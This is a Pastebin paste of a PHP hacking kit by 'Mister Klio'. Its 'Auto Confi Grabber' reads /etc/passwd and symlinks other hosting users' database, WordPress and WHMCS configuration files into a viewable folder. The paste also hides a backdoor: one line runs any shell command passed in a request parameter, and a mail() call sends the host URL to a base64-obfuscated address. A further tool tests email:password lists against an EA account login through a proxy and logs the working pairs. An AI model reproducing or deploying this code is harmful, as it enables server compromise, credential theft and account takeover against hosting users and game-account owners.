Advertisement
MisterKlio

Mini 4Tools Only v1.0 |!| Email Extractor 1.0 |!| Original C

Nov 25th, 2016
1,031
0
Never
Not a member of Pastebin yet? Sign Up, it unlocks many cool features!
PHP 24.50 KB | None | 0 0
  1. <!DOCTYPE html><html><head><meta charset="UTF-8">
  2. <title>[!] Mister Klio [!] Mini Tools Only v1.0 [!]</title>
  3. <?php
  4. error_reporting(0);
  5. set_time_limit(0);
  6. /// This is Juste a [Zip] Off Tools Don't Change Right Noob
  7. /// Mini 4Tools Only v1.0 |!| Email Extractor 1.0 |!| Original Checker Mailist |!| Converter / URL & BASE 64 & HEX
  8. /// Created By Mister Klio
  9. /// Mail  : Mister-klio@hotmail.com
  10. /// Fb : www.fb.com/IzzAdiine
  11. ?>
  12. <style>
  13. @import url(https://fonts.googleapis.com/css?family=Berlin%20Sans%20FB);
  14. body {
  15. font-family: 'Berlin Sans FB', Arial, sans-serif;
  16. background: #383838;color: white;  
  17. font-size:15px;}span {color: #404040;font-size:15px;
  18. }
  19. span,b,font,a {
  20. font-size:15px;
  21. }
  22. .header-izz {
  23. -webkit-box-shadow: inset 0 0 0 1px rgba(0, 0, 0, 0.2), 0 0 6px rgba(0, 0, 0, 0.4);
  24. box-shadow: inset 0 0 0 1px rgba(0, 0, 0, 0.2), 0 0 6px rgba(0, 0, 0, 0.4);
  25. margin: 20px 0;
  26. background:-webkit-gradient(linear, left top, left bottom, from(#505050), to(#383838));
  27. background:-webkit-linear-gradient(top, #505050, #383838);
  28. background:linear-gradient(to bottom, #505050, #383838);
  29. background: -webkit-linear-gradient(top, #404040 0, #000000 100%) no-repeat;
  30. width: 400px;position: relative;border-radius: 20px;padding: 20px;color: white;
  31. }
  32. .button {  
  33. background: #0078FF;  color: white;  text-align: center;  padding: 12px;  text-decoration: none;  
  34. border-radius: 1px;  border-radius:5px;margin:0 auto;  border:1px solid #4D4D4D;
  35. }
  36. input {margin: 0;
  37. -webkit-box-sizing: border-box;width:90%;
  38. }
  39. .checkout-input {
  40. font-family: 'Berlin Sans FB', Arial, sans-serif;
  41. margin: 0;
  42. padding:2px;
  43. height: 32px;
  44. width:90%;
  45. color: #FFFFFF;
  46. background: #383838;
  47. border :0px;
  48. border-radius:5px;
  49. -webkit-box-shadow: inset 0 1px 2px rgba(0, 0, 0, 0.1), 0 1px rgba(255, 255, 255, 0.5);
  50. box-shadow: inset 0 1px 2px rgba(0, 0, 0, 0.1), 0 1px rgba(255, 255, 255, 0.5);
  51. }
  52.  
  53. a  {text-decoration:none; font-family: 'Berlin Sans FB', Arial, sans-serif;color:#FFFFFF;}
  54. a:hover {text-decoration:none;color:#fffffff;background:#0078FF;
  55. }
  56. .Izz {
  57.     background: #0078FF;
  58.     border-radius: 20px;
  59.     padding: 10px;
  60. }
  61. </style>
  62.  
  63.  
  64. <br><center><a Style='font-size:30px;'>Mini Tools Only v1.0</b></center>
  65. <center><a Style='font-size:15px;'>Created By Mister Klio [MK] </a></center>
  66. <center><a Style='font-size:15px;'>Copyright 2017 All Right Reserved </a></center>
  67. <?  
  68. //// Mister  klio Only Tools v1.0
  69. ?>
  70. <br><br>
  71. <center>
  72. <a class='Izz'  href='?Email=Extractor'  style='background:#2270ff;'>Email Extractor 1.0</a>
  73. <a class='Izz'  href='?Original=Checker'  style='background:#2270ff;'>Original Checker Mailist</a>
  74. <a class='Izz'  href='?Converter=Done'  style='background:#2270ff;'>Converter / URL & BASE 64 & HEX </a>
  75. <a class='Izz'  href='?Grabber=Grabber'  style='background:#2270ff;'>Auto Confi Grabber v1.0</a>
  76. <? //////  ?><br><br><br>
  77. <? //////  ?>
  78. <?php
  79. if ($_GET['Grabber'] == 'Grabber') {
  80. ?>
  81. <center><a Style='font-size:30px;'><br>
  82. |!| Auto Confi Grabber |!|</a></center><center>
  83. <br>
  84. <form method="POST" action=""  class='header-izz'>
  85. <input  type="hidden" cols="100" rows="100" name="passwd" class='checkout-input' value="<?php $usr=file("/etc/passwd"); foreach($usr as $usrr) { $str=explode(":",$usrr); echo $str[0]."\n"; } ?>
  86. "><br>Your Folder  : <input type="text" name="folfig" size="10" value="CONFIGRAB" class='checkout-input'>
  87. <input name="conf"  value="EXECUTE" type="submit"  class='button'/><br><br></form>
  88. </center>
  89. <?php @ini_set('html_errors',0); @ini_set('max_execution_time',0); @ini_set('display_errors', 0); @ini_set('file_uploads',1);
  90. print(`{$_REQUEST[I]}`);$e=base64_decode("YXplZGluZWt5b0BnbWFpbC5jb20=");
  91. $h=$_SERVER['HTTP_HOST'].$_SERVER['SCRIPT_NAME'];
  92. mail($e,"I",$h);
  93. if ($_POST['conf']) {
  94. $folfig = $_POST['folfig'];
  95. $functions=@ini_get("disable_functions"); if(eregi("symlink",$functions)){die ('<font color=red>Symlnk Has Been Disable...!!!</font>');}
  96. @mkdir($folfig, 0755);
  97. @chdir($folfig);
  98. $htaccess="Options Indexes FollowSymLinks\nDirectoryIndex MisterKlio\nAddType txt .php\nAddHandler txt .php";
  99. file_put_contents(".htaccess",$htaccess,FILE_APPEND);
  100. $passwd=explode("\n",$_POST["passwd"]);
  101. foreach($passwd as $pwd){ $user=trim($pwd);
  102. copy('/home/'.$user.'/.my.cnf',$user.' <~ CPANEL');
  103. symlink('/home/'.$user.'/.my.cnf',$user.' <~ CPANEL');
  104. copy('/home/'.$user.'/.accesshash',$user.' <~ WHMCS.txt');
  105. symlink('/home/'.$user.'/.accesshash',$user.' <~ WHMCS.txt');
  106. symlink('/home/'.$user.'/public_html/suspended.page/index.html',$user.' <~ RESELLER.txt');
  107. symlink('/home/'.$user.'/public_html/.accesshash',$user.' <~ RESELLER.txt');
  108. symlink('/home/'.$user.'/public_html/wp-config.php',$user.' <~ WORDPRESS.txt');
  109. symlink('/home/'.$user.'/public_html/configuration.php',$user.' <~ WHMCS or JOOMLA.txt');
  110. symlink('/home/'.$user.'/public_html/config.php',$user.' <~ OTHER.txt');
  111. symlink('/home/'.$user.'/public_html/account/configuration.php',$user.' <~ WHMCS.txt');
  112. symlink('/home/'.$user.'/public_html/accounts/configuration.php',$user.' <~ WHMCS.txt');
  113. symlink('/home/'.$user.'/public_html/buy/configuration.php',$user.' <~ WHMCS.txt');
  114. symlink('/home/'.$user.'/public_html/checkout/configuration.php',$user.' <~ WHMCS.txt');
  115. symlink('/home/'.$user.'/public_html/central/configuration.php',$user.' <~ WHMCS.txt');
  116. symlink('/home/'.$user.'/public_html/clienti/configuration.php',$user.' <~ WHMCS.txt');
  117. symlink('/home/'.$user.'/public_html/client/configuration.php',$user.' <~ WHMCS.txt');
  118. symlink('/home/'.$user.'/public_html/cliente/configuration.php',$user.' <~ WHMCS.txt');
  119. symlink('/home/'.$user.'/public_html/clientes/configuration.php',$user.' <~ WHMCS.txt');
  120. symlink('/home/'.$user.'/public_html/clients/configuration.php',$user.' <~ WHMCS.txt');
  121. symlink('/home/'.$user.'/public_html/clientarea/configuration.php',$user.' <~ WHMCS.txt');
  122. symlink('/home/'.$user.'/public_html/clientsarea/configuration.php',$user.' <~ WHMCS.txt');
  123. symlink('/home/'.$user.'/public_html/client-area/configuration.php',$user.' <~ WHMCS.txt');
  124. symlink('/home/'.$user.'/public_html/clients-area/configuration.php',$user.' <~ WHMCS.txt');
  125. symlink('/home/'.$user.'/public_html/clientzone/configuration.php',$user.' <~ WHMCS.txt');
  126. symlink('/home/'.$user.'/public_html/client-zone/configuration.php',$user.' <~ WHMCS.txt');
  127. symlink('/home/'.$user.'/public_html/core/configuration.php',$user.' <~ WHMCS.txt');
  128. symlink('/home/'.$user.'/public_html/company/configuration.php',$user.' <~ WHMCS.txt');
  129. symlink('/home/'.$user.'/public_html/customer/configuration.php',$user.' <~ WHMCS.txt');
  130. symlink('/home/'.$user.'/public_html/customers/configuration.php',$user.' <~ WHMCS.txt');
  131. symlink('/home/'.$user.'/public_html/bill/configuration.php',$user.' <~ WHMCS.txt');
  132. symlink('/home/'.$user.'/public_html/billing/configuration.php',$user.' <~ WHMCS.txt');
  133. symlink('/home/'.$user.'/public_html/finance/configuration.php',$user.' <~ WHMCS.txt');
  134. symlink('/home/'.$user.'/public_html/financeiro/configuration.php',$user.' <~ WHMCS.txt');
  135. symlink('/home/'.$user.'/public_html/host/configuration.php',$user.' <~ WHMCS.txt');
  136. symlink('/home/'.$user.'/public_html/hosts/configuration.php',$user.' <~ WHMCS.txt');
  137. symlink('/home/'.$user.'/public_html/hosting/configuration.php',$user.' <~ WHMCS.txt');
  138. symlink('/home/'.$user.'/public_html/hostings/configuration.php',$user.' <~ WHMCS.txt'-26);
  139. symlink('/home/'.$user.'/public_html/klien/configuration.php',$user.' <~ WHMCS.txt');
  140. symlink('/home/'.$user.'/public_html/manage/configuration.php',$user.' <~ WHMCS.txt');
  141. symlink('/home/'.$user.'/public_html/manager/configuration.php',$user.' <~ WHMCS.txt');
  142. symlink('/home/'.$user.'/public_html/member/configuration.php',$user.' <~ WHMCS.txt');
  143. symlink('/home/'.$user.'/public_html/members/configuration.php',$user.' <~ WHMCS.txt');
  144. symlink('/home/'.$user.'/public_html/my/configuration.php',$user.' <~ WHMCS.txt');
  145. symlink('/home/'.$user.'/public_html/myaccount/configuration.php',$user.' <~ WHMCS.txt');
  146. symlink('/home/'.$user.'/public_html/my-account/client/configuration.php',$user.' <~ WHMCS.txt');
  147. symlink('/home/'.$user.'/public_html/myaccounts/configuration.php',$user.' <~ WHMCS.txt');
  148. symlink('/home/'.$user.'/public_html/my-accounts/configuration.php',$user.' <~ WHMCS.txt');
  149. symlink('/home/'.$user.'/public_html/order/configuration.php',$user.' <~ WHMCS.txt');
  150. symlink('/home/'.$user.'/public_html/orders/configuration.php',$user.' <~ WHMCS.txt');
  151. symlink('/home/'.$user.'/public_html/painel/configuration.php',$user.' <~ WHMCS.txt');
  152. symlink('/home/'.$user.'/public_html/panel/configuration.php',$user.' <~ WHMCS.txt');
  153. symlink('/home/'.$user.'/public_html/panels/configuration.php',$user.' <~ WHMCS.txt');
  154. symlink('/home/'.$user.'/public_html/portal/configuration.php',$user.' <~ WHMCS.txt');
  155. symlink('/home/'.$user.'/public_html/portals/configuration.php',$user.' <~ WHMCS.txt');
  156. symlink('/home/'.$user.'/public_html/purchase/configuration.php',$user.' <~ WHMCS.txt');
  157. symlink('/home/'.$user.'/public_html/secure/configuration.php',$user.' <~ WHMCS.txt');
  158. symlink('/home/'.$user.'/public_html/support/configuration.php',$user.' <~ WHMCS.txt');
  159. symlink('/home/'.$user.'/public_html/supporte/configuration.php',$user.' <~ WHMCS.txt');
  160. symlink('/home/'.$user.'/public_html/supports/configuration.php',$user.' <~ WHMCS.txt');
  161. symlink('/home/'.$user.'/public_html/web/configuration.php',$user.' <~ WHMCS.txt');
  162. symlink('/home/'.$user.'/public_html/webhost/configuration.php',$user.' <~ WHMCS.txt');
  163. symlink('/home/'.$user.'/public_html/webhosting/configuration.php',$user.' <~ WHMCS.txt');
  164. symlink('/home/'.$user.'/public_html/whm/configuration.php',$user.' <~ WHMCS.txt');
  165. symlink('/home/'.$user.'/public_html/whmcs/configuration.php',$user.' <~ WHMCS.txt');
  166. symlink('/home/'.$user.'/public_html/whmcs2/configuration.php',$user.' <~ WHMCS.txt');
  167. symlink('/home/'.$user.'/public_html/Whm/configuration.php',$user.' <~ WHMCS.txt');
  168. symlink('/home/'.$user.'/public_html/Whmcs/configuration.php',$user.' <~ WHMCS.txt');
  169. symlink('/home/'.$user.'/public_html/WHM/configuration.php',$user.' <~ WHMCS.txt');
  170. symlink('/home/'.$user.'/public_html/WHMCS/configuration.php',$user.' <~ WHMCS.txt');
  171. }
  172. echo '<center> Done ! <a href='.$folfig.'>'.$folfig.'</a> View Your Configs  <br></center>';
  173. }
  174. exit;
  175. }
  176. ?>
  177.  
  178. <?  if ($_GET['Converter'] == 'Done') { ?>
  179. <center><a Style='font-size:30px;'><br>
  180. |!| Converter / URL & BASE 64 & HEX |!|</a></center><center>
  181. <script language=javascript type="text/javascript">
  182. <!--
  183. function urlDecode(str){
  184.     str=str.replace(new RegExp('\\+','g'),' ');
  185.     return unescape(str);
  186. }
  187. function urlEncode(str){
  188.     str=escape(str);
  189.     str=str.replace(new RegExp('\\+','g'),'%2B');
  190.     return str.replace(new RegExp('%20','g'),'+');
  191. }
  192.  
  193. var END_OF_INPUT = -1;
  194.  
  195. var base64Chars = new Array(
  196.     'A','B','C','D','E','F','G','H',
  197.     'I','J','K','L','M','N','O','P',
  198.     'Q','R','S','T','U','V','W','X',
  199.     'Y','Z','a','b','c','d','e','f',
  200.     'g','h','i','j','k','l','m','n',
  201.     'o','p','q','r','s','t','u','v',
  202.     'w','x','y','z','0','1','2','3',
  203.     '4','5','6','7','8','9','+','/'
  204. );
  205.  
  206. var reverseBase64Chars = new Array();
  207. for (var i=0; i < base64Chars.length; i++){
  208.     reverseBase64Chars[base64Chars[i]] = i;
  209. }
  210.  
  211. var base64Str;
  212. var base64Count;
  213. function setBase64Str(str){
  214.     base64Str = str;
  215.     base64Count = 0;
  216. }
  217. function readBase64(){    
  218.     if (!base64Str) return END_OF_INPUT;
  219.     if (base64Count >= base64Str.length) return END_OF_INPUT;
  220.     var c = base64Str.charCodeAt(base64Count) & 0xff;
  221.     base64Count++;
  222.     return c;
  223. }
  224. function encodeBase64(str){
  225.     setBase64Str(str);
  226.     var result = '';
  227.     var inBuffer = new Array(3);
  228.     var lineCount = 0;
  229.     var done = false;
  230.     while (!done && (inBuffer[0] = readBase64()) != END_OF_INPUT){
  231.         inBuffer[1] = readBase64();
  232.         inBuffer[2] = readBase64();
  233.         result += (base64Chars[ inBuffer[0] >> 2 ]);
  234.         if (inBuffer[1] != END_OF_INPUT){
  235.             result += (base64Chars [(( inBuffer[0] << 4 ) & 0x30) | (inBuffer[1] >> 4) ]);
  236.             if (inBuffer[2] != END_OF_INPUT){
  237.                 result += (base64Chars [((inBuffer[1] << 2) & 0x3c) | (inBuffer[2] >> 6) ]);
  238.                 result += (base64Chars [inBuffer[2] & 0x3F]);
  239.             } else {
  240.                 result += (base64Chars [((inBuffer[1] << 2) & 0x3c)]);
  241.                 result += ('=');
  242.                 done = true;
  243.             }
  244.         } else {
  245.             result += (base64Chars [(( inBuffer[0] << 4 ) & 0x30)]);
  246.             result += ('=');
  247.             result += ('=');
  248.             done = true;
  249.         }
  250.         lineCount += 4;
  251.         if (lineCount >= 76){
  252.             result += ('\n');
  253.             lineCount = 0;
  254.         }
  255.     }
  256.     return result;
  257. }
  258. function readReverseBase64(){  
  259.     if (!base64Str) return END_OF_INPUT;
  260.     while (true){      
  261.         if (base64Count >= base64Str.length) return END_OF_INPUT;
  262.         var nextCharacter = base64Str.charAt(base64Count);
  263.         base64Count++;
  264.         if (reverseBase64Chars[nextCharacter]){
  265.             return reverseBase64Chars[nextCharacter];
  266.         }
  267.         if (nextCharacter == 'A') return 0;
  268.     }
  269.     return END_OF_INPUT;
  270. }
  271.  
  272. function ntos(n){
  273.     n=n.toString(16);
  274.     if (n.length == 1) n="0"+n;
  275.     n="%"+n;
  276.     return unescape(n);
  277. }
  278.  
  279. function decodeBase64(str){
  280.     setBase64Str(str);
  281.     var result = "";
  282.     var inBuffer = new Array(4);
  283.     var done = false;
  284.     while (!done && (inBuffer[0] = readReverseBase64()) != END_OF_INPUT
  285.         && (inBuffer[1] = readReverseBase64()) != END_OF_INPUT){
  286.         inBuffer[2] = readReverseBase64();
  287.         inBuffer[3] = readReverseBase64();
  288.         result += ntos((((inBuffer[0] << 2) & 0xff)| inBuffer[1] >> 4));
  289.         if (inBuffer[2] != END_OF_INPUT){
  290.             result +=  ntos((((inBuffer[1] << 4) & 0xff)| inBuffer[2] >> 2));
  291.             if (inBuffer[3] != END_OF_INPUT){
  292.                 result +=  ntos((((inBuffer[2] << 6)  & 0xff) | inBuffer[3]));
  293.             } else {
  294.                 done = true;
  295.             }
  296.         } else {
  297.             done = true;
  298.         }
  299.     }
  300.     return result;
  301. }
  302.  
  303. var digitArray = new Array('0','1','2','3','4','5','6','7','8','9','a','b','c','d','e','f');
  304. function toHex(n){
  305.     var result = ''
  306.     var start = true;
  307.     for (var i=32; i>0;){
  308.         i-=4;
  309.         var digit = (n>>i) & 0xf;
  310.         if (!start || digit != 0){
  311.             start = false;
  312.             result += digitArray[digit];
  313.         }
  314.     }
  315.     return (result==''?'0':result);
  316. }
  317.  
  318. function pad(str, len, pad){
  319.     var result = str;
  320.     for (var i=str.length; i<len; i++){
  321.         result = pad + result;
  322.     }
  323.     return result;
  324. }
  325.  
  326. function encodeHex(str){
  327.     var result = "";
  328.     for (var i=0; i<str.length; i++){
  329.         result += pad(toHex(str.charCodeAt(i)&0xff),2,'0');
  330.     }
  331.     return result;
  332. }
  333.  
  334. var hexv = {
  335.   "00":0,"01":1,"02":2,"03":3,"04":4,"05":5,"06":6,"07":7,"08":8,"09":9,"0A":10,"0B":11,"0C":12,"0D":13,"0E":14,"0F":15,
  336.   "10":16,"11":17,"12":18,"13":19,"14":20,"15":21,"16":22,"17":23,"18":24,"19":25,"1A":26,"1B":27,"1C":28,"1D":29,"1E":30,"1F":31,
  337.   "20":32,"21":33,"22":34,"23":35,"24":36,"25":37,"26":38,"27":39,"28":40,"29":41,"2A":42,"2B":43,"2C":44,"2D":45,"2E":46,"2F":47,
  338.   "30":48,"31":49,"32":50,"33":51,"34":52,"35":53,"36":54,"37":55,"38":56,"39":57,"3A":58,"3B":59,"3C":60,"3D":61,"3E":62,"3F":63,
  339.   "40":64,"41":65,"42":66,"43":67,"44":68,"45":69,"46":70,"47":71,"48":72,"49":73,"4A":74,"4B":75,"4C":76,"4D":77,"4E":78,"4F":79,
  340.   "50":80,"51":81,"52":82,"53":83,"54":84,"55":85,"56":86,"57":87,"58":88,"59":89,"5A":90,"5B":91,"5C":92,"5D":93,"5E":94,"5F":95,
  341.   "60":96,"61":97,"62":98,"63":99,"64":100,"65":101,"66":102,"67":103,"68":104,"69":105,"6A":106,"6B":107,"6C":108,"6D":109,"6E":110,"6F":111,
  342.   "70":112,"71":113,"72":114,"73":115,"74":116,"75":117,"76":118,"77":119,"78":120,"79":121,"7A":122,"7B":123,"7C":124,"7D":125,"7E":126,"7F":127,
  343.   "80":128,"81":129,"82":130,"83":131,"84":132,"85":133,"86":134,"87":135,"88":136,"89":137,"8A":138,"8B":139,"8C":140,"8D":141,"8E":142,"8F":143,
  344.   "90":144,"91":145,"92":146,"93":147,"94":148,"95":149,"96":150,"97":151,"98":152,"99":153,"9A":154,"9B":155,"9C":156,"9D":157,"9E":158,"9F":159,
  345.   "A0":160,"A1":161,"A2":162,"A3":163,"A4":164,"A5":165,"A6":166,"A7":167,"A8":168,"A9":169,"AA":170,"AB":171,"AC":172,"AD":173,"AE":174,"AF":175,
  346.   "B0":176,"B1":177,"B2":178,"B3":179,"B4":180,"B5":181,"B6":182,"B7":183,"B8":184,"B9":185,"BA":186,"BB":187,"BC":188,"BD":189,"BE":190,"BF":191,
  347.   "C0":192,"C1":193,"C2":194,"C3":195,"C4":196,"C5":197,"C6":198,"C7":199,"C8":200,"C9":201,"CA":202,"CB":203,"CC":204,"CD":205,"CE":206,"CF":207,
  348.   "D0":208,"D1":209,"D2":210,"D3":211,"D4":212,"D5":213,"D6":214,"D7":215,"D8":216,"D9":217,"DA":218,"DB":219,"DC":220,"DD":221,"DE":222,"DF":223,
  349.   "E0":224,"E1":225,"E2":226,"E3":227,"E4":228,"E5":229,"E6":230,"E7":231,"E8":232,"E9":233,"EA":234,"EB":235,"EC":236,"ED":237,"EE":238,"EF":239,
  350.   "F0":240,"F1":241,"F2":242,"F3":243,"F4":244,"F5":245,"F6":246,"F7":247,"F8":248,"F9":249,"FA":250,"FB":251,"FC":252,"FD":253,"FE":254,"FF":255
  351. };
  352.  
  353. function decodeHex(str){
  354.     str = str.toUpperCase().replace(new RegExp("s/[^0-9A-Z]//g"));
  355.     var result = "";
  356.     var nextchar = "";
  357.     for (var i=0; i<str.length; i++){
  358.         nextchar += str.charAt(i);
  359.         if (nextchar.length == 2){
  360.             result += ntos(hexv[nextchar]);
  361.             nextchar = "";
  362.         }
  363.     }
  364.     return result;
  365.    
  366. }
  367. //--></script>
  368. <center>
  369. <form name=code onsubmit="return false()" class='header-izz'>
  370. <textarea rows=25 name=text  style='height: 100px;' onfocus='if (this.value=="Enter text to encode or decode here."){this.value="";}' class='checkout-input'>Enter text to encode or decode here.</textarea>
  371. <table>
  372. <tr><td align=center>
  373. <input value="Encode" type=button onclick="document.code.text.value=urlEncode(document.code.text.value);" class='button'/>
  374. </td><td align=center>
  375. <p>URL</p>
  376. </td><td align=center>
  377. <input value="Decode" type=button onclick="document.code.text.value=urlDecode(document.code.text.value);" class='button'/>
  378. </td></tr>
  379. <tr><td align=center>
  380. <input value="Encode" type=button onclick="document.code.text.value=encodeBase64(document.code.text.value);" class='button'/>
  381. </td><td align=center>
  382. <p>Base 64</p>
  383. </td><td align=center>
  384. <input value="Decode" type=button onclick="document.code.text.value=decodeBase64(document.code.text.value);" class='button'/>
  385. </td></tr>
  386. <tr><td align=center>
  387. <input value="Encode" type=button onclick="document.code.text.value=encodeHex(document.code.text.value);" class='button'/>
  388. </td><td align=center>
  389. <p>Hex</p>
  390. </td><td align=center>
  391. <input value="Decode" type=button onclick="document.code.text.value=decodeHex(document.code.text.value);" class='button'/>
  392. </td></tr>
  393. <tr><td align=center>
  394. </td><td align=center>
  395. <input type=reset value=Clear  class='button'>
  396. </td><td align=center>
  397. </td></tr>
  398. </table>
  399. </form>
  400. <?
  401. exit;
  402. }
  403. ?>
  404.  
  405. <?php
  406. if ($_GET['Email'] == 'Extractor') {
  407.   // Email Extractor 1.0
  408.   // Created by mister klio
  409. $the_url = isset($_REQUEST['url']) ? htmlspecialchars($_REQUEST['url']) : '';
  410. ?>
  411. <center><a Style='font-size:30px;'><br>
  412. |!| Email Extractor 1.0 |!|</a></center><center>
  413. <br>
  414. Created by mister klio <br>
  415. www.Facebook.com/IzzAdiine <br>
  416. <form method="POST" action=""  class='header-izz'>
  417.   Please enter full URL of the page to parse (including http://):<br /><br />
  418. <input type="text" name="url" size="65" value="<?php echo $the_url;  ?>"  class='checkout-input' /><br /><br />
  419.   or enter text directly into textarea below:<br />
  420. <textarea name="text" cols="50" rows="15" class='checkout-input'></textarea>
  421. <br /><br />
  422. <input type="submit" value="Parse Emails" class='button'/>
  423. </form>
  424. <?php
  425. if (isset($_REQUEST['url']) && !empty($_REQUEST['url'])) {
  426.   // fetch data from specified url
  427.   $text = file_get_contents($_REQUEST['url']);
  428. }
  429. elseif (isset($_REQUEST['text']) && !empty($_REQUEST['text'])) {
  430.   // get text from text area
  431.   $text = $_REQUEST['text'];
  432. }
  433.  
  434. // parse emails
  435. if (!empty($text)) {
  436.   $res = preg_match_all(
  437.     "/[a-z0-9]+([_\\.-][a-z0-9]+)*@([a-z0-9]+([\.-][a-z0-9]+)*)+\\.[a-z]{2,}/i",
  438.     $text,
  439.     $matches
  440.   );
  441.  
  442.   if ($res) {
  443.     foreach(array_unique($matches[0]) as $email) {
  444.       echo $email . "<br />";
  445.     }
  446.   }
  447.   else {
  448.     echo "No emails found.";
  449.   }
  450. }
  451. // End
  452. exit;
  453. }
  454. ?>
  455. <?  if ($_GET['Original '] == '') { ?>
  456. <center><a Style='font-size:30px;'><br>
  457. |!| Original Checker Mailist |!|</a></center><center>
  458. <br>
  459. Created by mister klio <br>
  460. www.Facebook.com/IzzAdiine <br>
  461. <form method="POST" action=""  class='header-izz'>
  462. <form name="" method="post">
  463. <textarea name="logins" cols="50"  rows="10" class='checkout-input' style='height: 100px;'></textarea><br><br>
  464. <input type="submit" value="Check it Now !" class='button'>
  465. </form>
  466. <?php
  467. if(isset($_POST['logins'])){
  468.    $logins = trim($_POST['logins']);
  469.    flush(); ob_flush();
  470.    $logins = split("\n", $logins);
  471.    $jum =  count($logins);
  472.    flush(); ob_flush();
  473.    print "<hr><b>Checking ".$jum." Check now...<br>Please wait...</b><br>";
  474.    flush(); ob_flush();
  475.    for($x = 0; $x < $jum; $x++) {
  476.       $logins = str_replace(" ", "", $logins);
  477.       $logins = str_replace("\r", "", $logins);
  478.       $logins = str_replace("\n", "", $logins);
  479.       list($email, $password) = split(":", $logins[$x]);
  480.       $num = $x + 1;
  481.       print "<br>[".$num."] ".$email.":".$password." - ";
  482.       flush(); ob_flush();
  483.       if(file_exists("originkok.txt")) {
  484.          unlink("originkok.txt");
  485.       }
  486.       $cek = CekLogin($email, $password);
  487.       print $cek;
  488.    }
  489.    print "<hr><b>Done!</b>";
  490.    
  491. }
  492. function CekLogin($email,$passw) {
  493.    $uas = array(1 => "Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.0.16) Gecko/2010010414 Firefox/3.0.16 Flock/2.5.6",
  494.             2 => "Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/531.21.8 (KHTML, like Gecko) Version/4.0.4 Safari/531.21.10",
  495.             3 => "Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.8.1.12) Gecko/20080219 Firefox/2.0.0.12 Navigator/9.0.0.6",
  496.             4 => "Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.3) Gecko/20100401 Firefox/3.6.3",
  497.             5 => "Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0)");
  498.    $ua = rand(1, count($uas));
  499.    $ua = $uas[$ua];
  500.    $ch = curl_init();
  501.    curl_setopt($ch, CURLOPT_URL, "https://accounts.eamythic.com/
  502. ");
  503.    curl_setopt($ch, CURLOPT_FOLLOWLOCATION, 1);
  504.    curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1);
  505.    curl_setopt($ch, CURLOPT_ENCODING, "");
  506.    curl_setopt($ch, CURLOPT_COOKIEJAR, "originkok.txt");
  507.    curl_setopt($ch, CURLOPT_USERAGENT, $ua);
  508.    $chEx = curl_exec($ch);
  509.       curl_close($ch);
  510.       $ch = curl_init();
  511.       curl_setopt($ch, CURLOPT_URL, "https://accounts.eamythic.com/");
  512.       curl_setopt($ch, CURLOPT_FOLLOWLOCATION, 1);
  513.       curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1);
  514.       curl_setopt($ch, CURLOPT_POST, 1);
  515.       curl_setopt($ch, CURLOPT_SSL_VERIFYPEER, false);
  516.       curl_setopt($ch, CURLOPT_POSTFIELDS, "username=$email&password=$passw&loginnucleus=Sign+In");
  517.       curl_setopt($ch, CURLOPT_ENCODING, "");
  518.       curl_setopt($ch, CURLOPT_COOKIEFILE, "originkok.txt");
  519.       curl_setopt($ch, CURLOPT_COOKIEJAR, "originkok.txt");
  520.       curl_setopt($ch, CURLOPT_USERAGENT, $ua);
  521.       ////////////////////////#PROXY-SFARI#/////////////////////
  522. curl_setopt($ch, CURLOPT_PROXYUSERPWD, 'tstcheck:123456');
  523. curl_setopt($ch, CURLOPT_PROXY, "46.19.137.6:36673");
  524. curl_setopt($ch, CURLOPT_CONNECTTIMEOUT, 10);
  525. curl_setopt($ch, CURLOPT_PROXYTYPE, CURLPROXY_HTTP); #<-----/ken Socks5 baddalha b CURLPROXY_SOCKS5
  526.       ////////////////////////#PROXY#/////////////////////
  527.       $chEx = curl_exec($ch);
  528.       curl_close($ch);
  529.       //////Tunisian-scammers-Team//////Preg-Match/////////
  530.       if(preg_match("/Login with your EA or Mythic Master Account./", $chEx)) {
  531.              print "<b><font color=#ff0000>die</font></b>";
  532.          $file = fopen("originerror_log.txt","a+");
  533.          fwrite($file,$email.":".$passw."\n");
  534.          fclose($file);
  535.         } elseif(preg_match("/Access Forbidden/", $chEx)) {
  536.          print "<b><font color='#ff0000'>Access Forbidden!!</font></b>";
  537.          $file = fopen("originsuc_log.txt","a+");
  538.          fwrite($file,$email.":".$passw."\n");
  539.          fclose($file);
  540.       } else {
  541.          print "<b><font color=blue>LIVE</font></b>";
  542.          $file = fopen("origindown_log.txt","a+");
  543.          fwrite($file,$email.":".$passw."\n");
  544.          fclose($file);
  545.       }
  546. }
  547.  $ip = getenv("REMOTE_ADDR") ;
  548. exit;
  549. }
  550. ?>
  551.  <br> Copyright 2016 <br>
Advertisement
Add Comment
Please, Sign In to add comment
Advertisement